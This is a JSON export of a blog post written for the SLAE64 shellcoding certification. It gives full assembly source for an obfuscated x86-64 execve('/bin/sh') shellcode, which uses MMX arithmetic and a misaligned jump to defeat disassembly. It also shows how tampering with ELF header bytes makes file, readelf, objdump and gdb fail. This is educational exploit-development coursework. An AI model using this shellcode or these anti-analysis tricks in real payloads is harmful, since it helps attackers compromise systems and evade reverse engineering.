{"id":247,"date":"2018-02-25T11:40:56","date_gmt":"2018-02-25T10:40:56","guid":{"rendered":"http:\/\/pentester.blog\/?p=247"},"modified":"2019-08-18T19:48:51","modified_gmt":"2019-08-18T17:48:51","slug":"slae64-assignment-bonus-obfuscated-shellcode-and-unique-trick","status":"publish","type":"post","link":"https:\/\/hacktarus.fr\/?p=247","title":{"rendered":"SLAE64 &#8211; Assignment #Bonus &#8211; Obfuscated shellcode and unique trick"},"content":{"rendered":"<p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :<\/p>\n<p>http:\/\/www.securitytube-\u00adtraining.com\/online-\u00adcourses\/x8664-\u00adassembly-\u00adand-\u00adshellcoding-\u00adon-\u00adlinux\/index.html<\/p>\n<p>Student ID: PA-6470<\/p>\n<h2>Assignment #Bonus<\/h2>\n<p>So here are additionnal things I did for fun \ud83d\ude42<\/p>\n<h3>Obfuscated shellcode<\/h3>\n<p>First is a shellcode that use some obfuscation techniques like :<\/p>\n<ul>\n<li>MMX instructions<\/li>\n<li>disalign opcodes to prevent objdump to work<\/li>\n<li>additions to hide real values<\/li>\n<li>stack to store data instead of data segment<\/li>\n<\/ul>\n<pre>; This shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :\r\n; http:\/\/www.securitytube-training.com\/online-courses\/x8664-assembly-and-shellcoding-on-linux\/index.html\r\n;\r\n; Author : SLAE64-PA-6470 (kahlon81)\r\n; Date : 2018\/02\/21\r\n;\r\n; $ nasm -f elf64 sc64.nasm -o sc64.o\r\n; $ ld sc64.o -o sc64\r\n;\r\n; 64 bits system exec parameters : \r\n;\r\n; %rax  System call  %rdi  %rsi  %rdx  %r10  %r8\r\n; 0x3b  sys_execve  const char *filename   const char *const argv[]\tconst char *const envp[]\r\n\r\nglobal _start\r\n   \r\n_start:\r\n        ; \/bin\/sh in reverse order is hs\/nib\/ which is 0x68732f6e69622f in hexa\r\n        ; Obfuscate this value with a simple addition\r\n        ;  68 73 2f 6e 69 62 2f\r\n        ; - 50 53 01 42 4a 50 02  X value\r\n        ; = 18 20 2e 2c 1f 12 2d  Y value\r\n\tjmp begin+1\t\r\n\r\nbegin: \r\n\tdb 0xe9\t\t\t    ; E9 is opcode for jmp to disalign disassembly\r\n\t\r\n        mov rcx, 0x505301424a5002   ; X value \r\n\tmovq mm0, rcx               ; build the string value using MMX for obfuscation\r\n\tmov rcx, 0x18202e2c1f122d   ; Y value is padded\r\n\tmovq mm1, rcx\r\n\tpaddusb mm0, mm1            ; add mm0 with mm1 (parallel execution) and construct hs\/nib\/ \r\n\tmovq rcx, mm0\r\n\temms                        ; return to FPU mode\r\n\txor rdx, rdx                ; zero out rdx for an execve argument\r\n\tmov al, 0x30                ; move 0x30 (execve syscall is 0x3b) into al\r\n\tpush rcx                    ; push the immediate value stored in rcx onto the stack\r\n\tlea rdi, [rsp]              ; load the address of the string that is on the stack into rdi\r\n        add al, 0x0b\t\t    ; move 0x3b into al (execve syscall)\r\n\tsyscall                     ; make the syscall<\/pre>\n<p>&nbsp;<\/p>\n<h3>Unique trick<\/h3>\n<p>Second is a technique I found myself as I was working on the Linux ELF format.<\/p>\n<p>I noticed that it&rsquo;s possible to change some bytes in the ELF file header without altering the normal execution of the program. For instance you can persuade your executable is 32 bits even if in reality it&rsquo;s a 64 bits one. You can also indicate your binary is made for a big endian platform even if in reality it&rsquo;s not true. This technique maybe usefull againt reverse engineering.<\/p>\n<p>In order to alterate the header you can use any hexadecimal editor like hexcurse.<\/p>\n<p>The 5th byte defines format 32 bits (1) or 64 bits (2)<\/p>\n<p>The 6th byte defines endianness\u00a0<span class=\"s1\">LSB (1)\u00a0<\/span><span class=\"s1\">\u00a0MSB (1)<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-22\" src=\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2017\/12\/Capture-d%E2%80%99e%CC%81cran-2017-12-29-a%CC%80-22.04.30.png\" alt=\"\" width=\"1834\" height=\"308\" \/><\/p>\n<p class=\"p1\">Alterate the ELF header, save and run your shellcode and you&rsquo;ll see that it&rsquo;s running like a charm.<\/p>\n<p class=\"p1\">However the standard Linux tools such as\u00a0<strong>file, readelf, objdump, gdb<\/strong> <strong>ALL FAIL !<\/strong><\/p>\n<pre><strong>file sc64<\/strong>\r\nsc64elf: ELF 32-bit MSB *unknown arch 0x3e00* (SYSV)<\/pre>\n<pre>En-t\u00eate ELF:\r\n  Magique:   7f 45 4c 46 01 02 01 00 00 00 00 00 00 00 00 00 \r\n  Classe:                            <strong>ELF32<\/strong>\r\n  Donn\u00e9es:                          compl\u00e9ment \u00e0 2, syst\u00e8me \u00e0 octets de poids fort d'abord (<strong>big endian<\/strong>)\r\n  Version:                           1 (current)\r\n  OS\/ABI:                            UNIX - System V\r\n  Version ABI:                       0\r\n  Type:                              : 200\r\n  Machine:                           : 0x3e00\r\n  Version:                           0x1000000\r\n  Adresse du point d'entr\u00e9e:         0x80004000\r\n  D\u00e9but des en-t\u00eates de programme\u00a0:  0 (octets dans le fichier)\r\n  D\u00e9but des en-t\u00eates de section :    1073741824 (octets dans le fichier)\r\n  Fanions:                           0x0\r\n  Taille de cet en-t\u00eate:             53249 (octets)\r\n  Taille de l'en-t\u00eate du programme:  0 (octets)\r\n  Nombre d'en-t\u00eate du programme:     0\r\n  Taille des en-t\u00eates de section:    0 (octets)\r\n  Nombre d'en-t\u00eates de section:      0\r\n  Table d'indexes des cha\u00eenes d'en-t\u00eate de section: 0\r\n<strong>readelf: AVERTISSEMENT: en-t\u00eate ELF peut-\u00eatre endommag\u00e9 \u2013 il a un offset non nul pour l'en-t\u00eate de section mais pas d'en-t\u00eate de section<\/strong><\/pre>\n<pre><strong>objdump -M intel -D .\/sc64<\/strong>\r\nobjdump: .\/sc64: Fichier tronqu\u00e9\r\n<\/pre>\n<pre><strong>gdb .\/sc64<\/strong> \r\nGNU gdb (Debian 7.12-6) 7.12.0.20161007-git\r\nCopyright (C) 2016 Free Software Foundation, Inc.\r\nLicense GPLv3+: GNU GPL version 3 or later &lt;http:\/\/gnu.org\/licenses\/gpl.html&gt;\r\nThis is free software: you are free to change and redistribute it.\r\nThere is NO WARRANTY, to the extent permitted by law.  Type \"show copying\"\r\nand \"show warranty\" for details.\r\nThis GDB was configured as \"x86_64-linux-gnu\".\r\nType \"show configuration\" for configuration details.\r\nFor bug reporting instructions, please see:\r\n&lt;http:\/\/www.gnu.org\/software\/gdb\/bugs\/&gt;.\r\nFind the GDB manual and other documentation resources online at:\r\n&lt;http:\/\/www.gnu.org\/software\/gdb\/documentation\/&gt;.\r\nFor help, type \"help\".\r\nType \"apropos word\" to search for commands related to \"word\"...\r\n<strong>\"\/root\/shellcodes\/.\/sc64\": not in executable format: Fichier tronqu\u00e9<\/strong>\r\n(gdb)<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification : http:\/\/www.securitytube-\u00adtraining.com\/online-\u00adcourses\/x8664-\u00adassembly-\u00adand-\u00adshellcoding-\u00adon-\u00adlinux\/index.html Student ID: PA-6470 Assignment #Bonus So here are additionnal things I did for fun \ud83d\ude42 Obfuscated shellcode First is a shellcode that use some obfuscation techniques like : MMX instructions disalign opcodes to prevent objdump to &hellip; <a href=\"https:\/\/hacktarus.fr\/?p=247\" class=\"more-link\">Continuer la lecture de <span class=\"screen-reader-text\">SLAE64 &#8211; Assignment #Bonus &#8211; Obfuscated shellcode and unique trick<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-247","post","type-post","status-publish","format-standard","hentry","category-slae64"],"_links":{"self":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/247","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=247"}],"version-history":[{"count":11,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/247\/revisions"}],"predecessor-version":[{"id":285,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/247\/revisions\/285"}],"wp:attachment":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=247"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=247"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=247"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}